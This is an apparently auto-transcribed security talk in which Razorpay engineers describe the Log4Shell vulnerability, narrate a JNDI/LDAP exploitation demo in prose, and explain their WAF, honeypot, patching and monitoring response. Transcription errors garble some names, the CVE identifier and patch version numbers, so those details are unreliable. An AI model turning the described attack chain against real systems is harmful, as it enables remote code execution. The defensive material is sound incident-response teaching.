 Hi everyone, my name is Libin, I joined with Suchit and her chef from Visipay. We are this of course engineers in Visipay and in this talk we like to talk about local availability, how it affects us, what did we do to mitigate it and the steps we took and share the lessons we learned which we all could use in situations like this. Those who do say a bit more about us, we are deaf-searched engineers from Visipay working in different areas and fantastic development and operations. Next slide. So during this talk we like to discuss about what local availability is, the nature of its availability, the areas affected, how did we mitigate it, what are the steps we took, what are the countermeasures we tried, what worked and what didn't. Next slide. To say a bit about our company, Visipay is a fintech unicorn startup based out of India. We work in the new banking space, helping customers have their financial efficacy while they can focus on their business. To talk a bit about numbers and stats, we run roughly 600 teams with 600 current engineers, 100 plus microservices of the last year alone over a wide variety of tech stacks including GoPHP, Python, Java, Node.js, kind of anything that you name it and roughly 2000 deployments per month. All these numbers are just to show how complex, fast-paced deployment or infrastructure is kept up and running while such a series of security vulnerability occurred. Next slide. So what is all about? We all heard about low 4J unless you were in application for like two to three months. So low 4J is an vulnerability that occurred somewhere during December 9, 10 last year. Critical vulnerability, it occurred on a particular framework for logging in Java called log 4J and it courses an RCE or remote code execution. Next slide. So as you all seen, it's been affected by many, many of our enterprise services all over the world, whether it's Amazon, Apple, IBM, Juniper. So the funny thing about this is we normally use our login library to log information about application in some cases, whether to know there's an attack or an exception occurred. And this vulnerability itself affects the login library. So whatever you used to log, if there is a malicious payload, the available library itself will give you an RCE. So that's why the memes are there. So next slide. So what's this about? So this particular CVE named W4W8. First disclosed around December 10 last year. Courses an RCE in a library called log 4J and the name is at log 4 shell. And what it enables a hacker to do is to cause a remote code execution, meaning he can send a particular pattern of payload into a service and execute a code into that service, causing harm such as availability or run some malicious code which bring down the server or extract the data, you name it. But why is such a serious issue? Because this is not the first critical vulnerability that we see. So let's see why this stands out. Next slide. So we'll talk about four attributes of this particular vulnerability. First one is impact. So unlike many of the previous vulnerabilities that I've seen, log 4J is used by most or millions of softwares across the internet. Most of the Java-based application use log 4J as their local library. Now talk about criticality. This particular vulnerability causes an RCE which let users execute code on servers without pretty much less technical knowledge or any other precondition. So it's a pretty critical issue which is why it's given CPSS 10. Now the ease of exploitation. So it's a very simple attack. You can send a very simple payload in any request and get opposed to a server. We can have it in its headers or body or any request. And if that message, this particular message is being logged by a vulnerable library, it can cause the same attack, right? So it's very easy to use, made it very scripted, friendly. A lot of people started using it. We saw a lot of noise and attack patterns over the internet. And the last one is the availability of POCs. Soon after the first vulnerability was discovered, we observed a lot of POCs out there in the internet, which helped a lot of people create botnets out of this and a lot of attack patterns were thrown out in the internet, which were used by scripted all over the world to attack many services out there. So all of these four factors combined make this a very serious issue, a very critical issue because as soon as the availability was discovered, we started seeing all of the servers getting hit. People started reporting destructed services, data being extracted and all of this, right? So next slide. So what is this log4j, right? Log4j is a project from a passion of the foundation. It's an open source logging framework. It's used by millions of services out there, mostly by Java-based applications. And next we talk about a little bit of technicality here. So log4j uses a particular lookup feature called JNDI. It's called Java naming and directory interface. Why we should know about it? We'll look at it in the next slide. Next slide, please. So JNDI is an API framework for applications to interact with remote objects registered with, let's say, RMA registry or a service like the LDAP. So JNDI helps any Java applications to access these services remotely and secure classes or functions that you need, right? Now, why is it such an issue? Because from any Java application, you can use JNDI to call services like DNS, LDAP, NAS, and many more, right? So log4j uses this lookup in its program, meaning in log4j, you can call other services, mostly say LDAP, right? Now, why this is important? You will see it in our demo in next slide. Let me walk you through the timeline of log4j next. So now we go to know a little bit of log4j library, what the vulnerability is, how it's affecting everything. Let's see what happened during that period of time when this vulnerability was discovered. So at first, the vulnerability was called as a denial of service attack, moderately critical, meaning it was given a score of 3.7. Somewhere around December 10, the researchers were able to further exploit this attack to create an RCE vulnerability, causing a new CVE being reported, which escalated this score from 3.7 to 10 or 9, and immediately after Apache Foundation released the first patch, which is 2.16, soon after the patch, researchers were able to find another further vulnerability, caused them to release another version called 2.17, and soon after another one for 2.7, 1.7.1, meaning it was just not one vulnerability that was reported, but a series of vulnerabilities causing multiple patches from 2.15 to 2.17 over a period of two weeks. So from a team's perspective, from a consumer perspective who are using these vulnerabilities, we just didn't have just upgrade once, but we have to upgrade thrice to have mitigations in place. Next slide. Now let me walk you through the slides or the time that happened around in Recipe. So around December 10, at that time, we first started observing the reports about a zero day about a log4j library vulnerability out there in the world, and soon after, we saw a spike in our traffic. A lot of anomalies were being hit or being sent or requests, invalid requests being sent, and we immediately form a team or a one-room. I think all of us did, and to analyze this traffic, and soon we confirmed that these traffics were indeed log4j payloads being sent to us, and as with the everybody team, we first applied the managed web rule set. I think AWS released the rule set, which is which we get this particular vulnerability, and but soon after, we figured out that this managed rule set didn't work for us, meaning it was blocking certain legitimate traffic. It was also not blocking certain traffic, which were, which have maybe newer variant payloads, right? So we switched from a managed rule set to a custom rule set. We started modifying these rules with updated patterns so that they mitigate these new payloads, new variants, also allows our legitimate business traffic to go through. And around the same time, we also started looking at the assets that we have, meaning how we are impacted from this vulnerability, right? So we use a lot of services which run across different landscapes. So if you want to know how many of our services were actually impacted by this particular vulnerability, right? And we had little time to do this. So next slide. So to know about log4j, right? So it's not really that easy to figure out whether an application is using log4j directly, or whether it's using indirectly, or whether one of your third parties is using it. So without further ado, we immediately passed all of our servers with first earlier medications which were released, meaning without getting affected, there's no time to manually verify all of the services which were affected. So we immediately passed all of the reductions. And then at around the same time, we started updating our VAFOS with Honeyport data. So why that's important will be discussed in the further down slide. And as soon after updating patching of reductions, we started packing patches using our asset inventory. So a bit about asset inventory will be explained to me for the slides. So it's, in short, it helps us identify which assets uses what kind of components and how they are mapped to different infrastructure components, right? And after that, we started a long journey to patch our services, which are vulnerable to log4j particular attack. Next slide. Next, we'll see a demo of how this attack works. For that, I'll hand it over to my colleague Sajed. Sajed, all yours. Thanks, Sajed. So yeah, like how we've been, you know, explained on how the attack started and the, you know, it progressed. So, you know, we, you know, let's, let's look into how the attack works. So basically on the technical aspects of the attack. So, you know, we do have a small, you know, chart which shows the attack sequence of, you know, proportion. So, you know, it starts with identification of vulnerable service, you know, so, you know, basically the attacker is, you know, scans scan through the internet looking for vulnerable service, service, which basically are using, you know, log4j. So once identified, the malicious payloads to the server, you know, basically in the request in the form of some headers or very parameters. Like as you can see in the diagram, right. So below the second, you know, entity, you can see a request basically which has, which is highlighted in red. So that is how the payload looks like. So, you know, once this is sent, the victim server logs this particular request using log4j. So here is where the vulnerability is. So, you know, where, you know, log4j, basically, once logged, it varies malicious adapts over, which is sent by the attacker. Then, you know, the LDAP in turn reaches, you know, or responds to malicious or the victim server basically with the malicious Java class, which is then, you know, basically exploit. So, looking at the same, you know, basically looking at the, you know, attack, we do have a small demo that we can look at how the attack basically works. So, I mean, sure, in this right, we can look at this particular screen. So we do have a two terminals running one on the towards the left, basically is, you know, just part of the screen is basically where a victim or a vulnerable server that is running, basically, you know, server that is using log4j. And, yeah, towards the right, we can see there is a LDAP server that is running. Basically, this is a malicious LDAP server that, you know, that is attack of control, basically running on 1c894. Yeah, so, yeah, so basically, you know, we do know this is a RC. So, you know, for us to identify how the RC works. So here we are running a listener, basically listening for ICMP package on this particular interface, and basically, you know, this is the application that is running or using log4j, which is running on localhost ATT. So, looking at this, you know, we, so basically the attack is where we, where, you know, the attacker sends a request to the vulnerable server. For example, if we look at the terminal on the right, so where we are sending a call request, so we are, we are sending a call request to localhost 8080, that is the vulnerable server. And, you know, we are, we are adding a header XAP of origin, which is, you know, which is basically, which has the payload of, you know, log4j. So, the payload is, you know, it contains LDAP pretty well. It is sending a request to the attacker's controlled LDAP server, but some, some, you know, payload in that, which, which I, you know, explain what the payload basically is and how it looks like. So, yeah, so if you look at this payload in the end, so this is a B64 encoded payload, which basically brings the listener that we are running, that is running on one, one and two, one, six, eight, fifty six dot ten. So, that is B64 encoded and it is used to hit that vulnerable server. So, as soon as, you know, we hit this request using call, we can observe it on the left side of the screen, which, you know, where we start getting hits. So, this confirms that, you know, the payload worked and we started getting there and our ping on the receiver. Just to point from this, we'll try to log into the, you know, vulnerable server using, you know, Docker Exit. So, we can see what exactly is happening itself. So, by a simple PS, you know, we can see that ping on this particular IP is basically run. So, this confirms, you know, that there was a code execution on the victim server. So, yeah, coming back to the slides, we, you know, we saw that, how that works. So, moving on to the response side of it, you know, how did we respond to this? So, this basically, you know, we had a three-step process where, you know, we started with a short-term, medium-term, and a long-term. So, the short-term, we, you know, concentrated on back updates, on updating back rules, then adding environment variables with containers, which will be covered in detail for the slides. Then, in the medium-term response, we did, you know, we did use data from Honeypot, which again, will go in depth, and we did a DAX simulation. And in long-term, you know, it was updating the affected versions and, you know, basically the updates. So, you know, moving on. So, this was one of our, you know, short-term or short-term response. So, where, you know, we started with BAF. It was basically our first an earlier of defense. A few things to talk on BAF, right? We initially went with this, which is AWS managed BAF, which did not work well for us as it was very generic, and it did block a few of our management rack. So, you know, as a result, we had to move to a custom rule, custom rule set, where, you know, where we manually, we constantly and manually updated the rules after our defense. So, we were getting this, you know, the payloads and bypasses from few ordinary online resources, such as Twitter, blogs. And one of our major sources was sans, you know, a honeypot that was set up by sans. So, yeah. So, you know, this is how, you know, our BAF rules that, you know, look like, you know, how it was updated and stuff. You know, these were the rules that we were using. And moving on, like, you know, talking about updating BAF rules with honeypots. So, why did we, you know, reach here is one of the things. So, you know, there were a lot of bypasses. I'm considering this BAF and we are using some some sort of patterns to, you know, predict it. There will be a lot of bypasses that will be coming, you know, as initially we were relying on BAF. We had to look for bypasses. So, based on the payloads and, you know, bypasses, we were adding custom BAF rules to block malicious traffic. So, for this, we use sans honey data from sans honeypot. Basically, sans had set up a honeypot which had a lot of data coming with respect to the payloads and bypasses. So, talking a little bit on honeypots, you know, sans have set up honeypots. So, basically, these honeypots are some systems which are used to lure attackers to gain some insights and inform their hacking attempts. Basically, you know, collect data on what kind of attacks or payloads of patterns that are being used, which were, you know, accessible through their APIs that was publicly available, which had all kinds of data with respect to the, you know, attacks, payloads, and bypasses. So, we had a simple setup where, you know, we pulled sans honeypot every 15 minutes to check for new payloads and bypasses. And whenever, you know, whenever we had a new bypass, we, you know, we were getting alert to a slack. And this was so whenever, you know, we fetch our data and this particular data, like, you know, for example, bypasses or payloads was sent to our BAF rule checker, which validates against our, and if it passed our, you know, BAF rule, basically on considering this is a bypass or not, we were getting alerts to our slack channel, which was then manually reviewed and updated by So, this helped in looking at different payloads and bypasses to, you know, to basically update the BAF. And talking about attack simulation with honeypot and other, you know, defenses said, we also wanted to internally run these payloads against our servers or to check for any vulnerable servers, basically to simulate attacks. So, you know, we had, we had a setup where, you know, we had one attack commission and Tina server, basically we've been using candid tokens to look for responses or feedback. We started, you know, sending out the payloads to all of our supplements as part of URL parameters headers and body of directors. So our DNA server would, you know, send an alert if there was a hit that it received. So, basically, this is how it worked. And, you know, we started monitoring this internally to check for our vulnerable servers and services that were present. So, moving on, I think now our colleague, Harsha is going to take over from other protection or measures responses that we had. So, who do you, Harsha? Thanks, Sujit. Like Sujit explained, we had multiple layers of defenses put at the off layer to prevent our systems from getting exploited. Now, let's go a little deep towards the application side. As a short-term solution, one of the mitigation measures that we have done is to patch all our systems, the workload, the workloads, the deployments, crown jobs with this environmental variable, log4j format misses, no lookups whose value is set to true. Like Levin mentioned in one of the previous slides, we make around 2000 deployments per month. That's really very high value. And there's a very good chance that these environmental variables that we injected into the deployment manifest make it overridden. And freezing deployments is not something that we want to do. So, to not affect the developer productivity and at the same time to ensure that these applications are not vulnerable to this attack, we came up with a solution to use Kubernetes dynamic admission controllers. Now, just to give a rough idea on what these admission controllers are, admission controller is nothing but a code that intercepts the request made to the Kubernetes API server. It sits between the requester and the Kubernetes API server. And what exactly did this mutating admission controllers do is, like the name says, whenever there is a mutate or an admit even, these controllers made sure that the objects are created with this environmental variable injected in them. So, this diagram shows how a request reaches the Kubernetes API server and where the admission controller code sits and how it injects the environmental variables. So, moving on to the long-term solutions, one of the long-term solutions to ensure that the applications are not vulnerable to attack, to this attack is to obviously ensure that they are upgraded if they have vulnerable log4j dependencies. Now, the interesting piece comes here, log4 shell attack can be carried out even if the applications have third or fourth or ninth layer dependencies. So, how do we identify the applications that have direct or indirect log4j dependencies? For this, we initially took the help of dependabot. What these dependabot? Dependabot is an OSS scanner that compiles all OSS dependencies across the repositories in the organization. Dependabot helped us identify the vulnerable log4j dependencies in our code. And initially, we made use of dependabot to identify the applications that are log4 shell vulnerable. We also made use of SIFT, SIFT is an open source tool that helped us generate and respond from the container images. So, basically these two tools helped out identifying log4j dependencies both in the application and the container images. There's an interesting thing that I would like to speak about here. That is razor pay asset inventory. Razor pay asset inventory turned out to be our silver bullet in identifying production systems that are affected by this and that are vulnerable to this log4j, log4 shell attack. It helped us identify the container images, the applications and the owners and the mappings between them. So, we do have a tool that gave us information about all the assets in our company and the relations between them. Now, having such an inventory in a company where there are hundreds of microservices and being able to quickly identify the owners helped us incredibly well in upgrading our systems as quickly as we can. And what exactly is this tool and what are these assets if you're interested to know more about it? There's one more talk from Satyaki and Sandesh from Razor Pay Security team who will be speaking about the asset inventory project at Razor Pay. You can follow the below link to know more about it. So, we put some short-term solutions, we put some long-term solutions to prevent this attack. Are these defenses enough to stop the attack? No, because we used many third-party applications that we directly or indirectly run that may use a vulnerable log4j versions. For example, we use Looker, Neo4j, Redis Labs and the problem is we do not have sufficient high-level control over what the third-party provider runs either on our systems or in their systems. And for this, the only solution we had is to keep track of the vendors, the upstream providers and have back-and-forth communication with them to check if their systems are updated so they do not log any of these log4j attack payloads. Our major provider AWS also kept us posted on how they patched their systems and which of their services got affected because of this. And coming to the third-party dependencies, we made use of GRIP which scans the contents of a container image to find known vulnerabilities in some of the major operating systems and also to find vulnerabilities in language-specific packages. You can go to the next slide. So what next? We had plans for prevention. The next important thing that comes into the picture is monitoring. Monitoring the egress traffic and how we exactly went about monitoring during the log4j time, I'm going to explain. We gathered a threat list of IPs from various sources like sands and crowdsets and we closely monitored if any of our systems are interacting with the threat list of IPs. For this, since we are mostly the folks on AWS, we took the help of AWS detectives IP address analytics to figure out whether there is any interaction from any of our systems with the threat list of IPs. As you must already have known that the detective takes its feeds from BPC flow logs and cloud trail events, it helped us determine if there are any events of interactions with the gathered list of IPs. We also ensured that this gathered list of IPs is continuously updated with some custom scripts. You can go to the next slide. So what went well for us? Having an asset inventory, bomb services and other in front, making use of them to quickly identify the application owners and upgrading the applications in a warfront mode really turned out to be a silver bullet for us. Our defense and depth mechanism also helped us in reducing the attack surface. Our web application firewall was the first layer, that is the first layer of defense that we have put, blocked a ton of log4j payloads from entering our systems. The next thing we deployed, we patched all our deployments so that with the environmental variables, so that they do not make the JNDL lookups. Next, we upgraded each of the applications that have dependencies on vulnerable log4j versions. And finally, having custom built warf rules that can understand the business context also proved out to be very helpful for us, as our firewall rules managed to block more attack traffic than some of the managed warf rules provided by the third parties. Thanks, Libin, Sushit and Shri Harsha for an amazing discussion around this. I think I was the point around the asset, the software asset inventory, which is generally not very exciting for security folks, turns out to be a real key element during these times. So that was a great message in that. One of the things that I was thinking when listening to your talk was also those couple of weeks and what a roller coaster that was, and of course also some of the months that followed after that. But this is quite ingenious. So I am pretty excited about this topic and I love the session. I had a couple of questions myself. Maybe I'll start with one of those. One question I had was you were talking about how many assets, right? So you started looking at how many assets were impacted. I was thinking, what can you do about the infrastructure components that are affected, where there may be dependency, for example, on a third party to upgrade their infrastructure components? How do you tackle that or what do you think is the best way to tackle that in such a scenario? Sandesh, do you want to take this question? Sure. So I work with such a discharge as well. So yeah, so that was a much longer drawn out process than fixing our own systems. I think it didn't take us, so one, it was not always clear if log4j was used by all our third parties. We knew which of them kind of used Java and which game, etc. So we had a fair idea if they'll be relevant or not. We then had to reach out to our vendors to figure out if they're using log4j or not, and then figure out if there's an update, etc. Some vendors, I must say, were extremely proactive. They actually sent us things even before we asked them, right? So which was great. Even when we were doing this file, we had some vendors reach out and say, hey, you know, our voices are vulnerable. Here's what you need to do to upgrade. And in the meantime, here's what you can do to stop. So that was great. But with especially one or two vendors, I don't want to name anyone. It was a long drawn out battle process, right? And I think one thing we kind of realized, you know, this is kind of goes back to the security hygiene in general, is that if you're using older versions of a particular product, right? And then you haven't upgraded because of other reasons, for regression reasons or whatever it is, this is when, and something like log4j happened, that's when it comes to really biting, right? Because now you don't want to upgrade to the latest version because, you know, it'll break a bunch of stuff. But at the same time, you can't not upgrade because it's vulnerable to log4j. So this was a good lesson for us on, you know, why you need to upgrade, you know, have better patch hygiene and better hygiene as well. By and large, I think it was okay. It was a long drawn out process, but it was fine. But there were definitely one or two instances where, you know, I know Harsha is smiling because he didn't fit some of them. It went on for a really long time. You know, we were holding outlets and the wall of rules and everything. Yeah, I think as a security team, I mean, I would like to add that you also grow with the vulnerability, right? So that time when the vulnerability was adapting and for 2.16, again, they had another issue, then we went ahead and patched that as well. So you grow and you grow to get that patience as well, gradually. You grow old actually. Good point. One, another question while we are getting some of the other questions was, I was thinking of, so we heard a lot about what security teams can do, right? And I think a lot of these including some of the alternate controls that we could use for the vulnerability that could be applied. There are solutions like WAF and other things, which you have clearly called out. Looking back, is there one thing that you could tell the developers, maybe all the developers or audience that are watching us, what can they do to be prepared for zero days like this? If Libin was here, you would have answered this because this is kind of part of his daily job here. But he had to kind of step out for a personal emergency. So yeah, so I think from a developer's perspective, I think there are a few things, right? But at least within Razorpay, we rely on open source scanning tools like Dependabot and we also kind of, we also use gripe in multiple cases. So I mean, we have an S-bomb, which will basically tell you the list of all the dependencies you're using and also tells you which of them are vulnerable. Now, the problem with the current technology is to kind of, it's not very clear if you're using the particular vulnerable package in a vulnerable library. So sometimes it becomes hard to know whether you actually are vulnerable or not. But as hygiene, if you can actually make sure that you are aware of what open source software you're using and make sure that you are upgraded to the latest version, then that solves it. But that's much easier said. It's very easy for us to say it, but it's much harder to actually get it done. So for us, I mean, from a security perspective, how we help developers is at least make it very easy for them to know which of the repos have which vulnerabilities, like which open source packages have, and we know where the instances are. What would be really nice if you can somehow come up with technology or come up with ways of saying, hey, you know, you're using a particular library, which has a vulnerability in, say, function X. And since we are not calling the function, we don't have to worry. Or since we are calling it, you have to do. So then the signal to noise ratio becomes much better. But I don't know of a tool that does that very well. And I think doing it manually does not scale and there's a pain there. So yeah. So at this point, if developers are watching, first of all, thank you for all the help. But more than that, you know, if you can, if you can kind of, you know, make sure that, you know, if your security model has an S-bomb and an open source kind of use that, if not, there are plenty of open source tools available, like, you know, gripe, gripe from, from, I think I forget the name of the company, but also OWASP dependencies scanner from OWASP. There are a few open source tools which do it. So you can run a scan, get a list of all your vulnerable dependencies, and make sure it's updated. That's cool. If you can integrate that with your CICD pipeline, yeah, even that first stage to get that visibility, right, that itself is, can be a struggle, where you don't have this very much organized and stuff like that and having automation around dependency, I think these two things will make life, everyone's life much easier. So that's great message there. Thanks. Thanks, Sandesh. So thanks a lot to all our speakers for the sessions today. This marks the end of a three-part series on risk assessment and mitigation with raise of pay.